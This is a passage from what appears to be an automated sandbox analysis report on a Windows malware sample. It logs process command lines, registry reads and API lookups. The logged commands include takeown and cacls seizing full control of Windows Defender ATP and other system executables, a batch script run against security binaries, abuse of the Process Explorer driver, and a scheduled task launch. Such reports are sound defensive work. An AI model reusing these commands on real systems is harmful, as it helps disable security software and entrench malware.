| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ff92f1bf2e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ff92fde5eb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ff92fdec1b0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x7ff931fe56b0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationThread, address_out = 0x7ff931fe5830 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x7ff931fe5a50 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySymbolicLinkObject, address_out = 0x7ff931fe7da0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryDirectoryObject, address_out = 0x7ff931fe7a40 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenSymbolicLinkObject, address_out = 0x7ff931fe77c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenDirectoryObject, address_out = 0x7ff931fe5e90 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryObject, address_out = 0x7ff931fe5590 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySection, address_out = 0x7ff931fe5db0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitAnsiString, address_out = 0x7ff931f5bfc0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitUnicodeString, address_out = 0x7ff931f51620 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlAnsiStringToUnicodeString, address_out = 0x7ff931f642e0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeUnicodeString, address_out = 0x7ff931f5c460 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeAnsiString, address_out = 0x7ff931f5c460 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlUnicodeStringToAnsiString, address_out = 0x7ff931f65220 |
|
1 |
Driver (2428)
| Operation | Driver | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
2262 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335004c |
|
4 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335003c |
|
6 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350014 |
|
5 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
56 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
95 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (20)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | - |
|
8 | |
| Get Info | - |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
9 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #179: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #179 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:56, Reason: Child Process |
| Unmonitor | End Time: 00:04:15, Reason: Self Terminated |
| Monitor Duration | 00:00:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x13cc |
| Parent PID | 0x910 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
13E8
0x
1224
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #180: cmd.exe
92
0
| Information | Value |
|---|---|
| ID | #180 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:57, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:28 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1268 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
904
0x
1388
|
Host Behavior
File (44)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
5 | |
| Open | STD_OUTPUT_HANDLE | - |
|
20 | |
| Open | STD_INPUT_HANDLE | - |
|
4 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x4bc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (20)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #181: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #181 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\UNP\convertible-suicide-construction.exe" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:57, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x120c |
| Parent PID | 0x1334 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1194
0x
10E8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #183: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #183 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:00, Reason: Child Process |
| Unmonitor | End Time: 00:04:22, Reason: Self Terminated |
| Monitor Duration | 00:00:22 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x11cc |
| Parent PID | 0xfac (c:\windows\system32\apphostregistrationverifier.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1384
0x
1198
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #184: cmd.exe
87
0
| Information | Value |
|---|---|
| ID | #184 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:02, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:23 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xce8 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
11B0
0x
EF8
|
Host Behavior
File (42)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
5 | |
| Open | STD_OUTPUT_HANDLE | - |
|
19 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 106 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 168, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (18)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 |
Process #187: schtasks.exe
243
0
| Information | Value |
|---|---|
| ID | #187 |
| File Name | c:\windows\syswow64\schtasks.exe |
| Command Line | schtasks /Run /I /tn DSHCA |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:07, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:18 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1350 |
| Parent PID | 0x1100 (c:\windows\syswow64\cacls.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FF8
0x
10EC
|
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\schtasks.exe | base_address = 0x1300000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\schtasks.exe, file_name_orig = C:\WINDOWS\SysWOW64\schtasks.exe, size = 260 |
|
2 |
Process #188: cmd.exe
49
0
| Information | Value |
|---|---|
| ID | #188 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:08, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:16 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe10 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1340
0x
1330
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (12)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 |
Process #190: cmd.exe
51
0
| Information | Value |
|---|---|
| ID | #190 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c mxkeFu6a.exe -accepteula "MsSense.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:14, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9c0 |
| Parent PID | 0xeb4 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CC0
0x
11C0
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
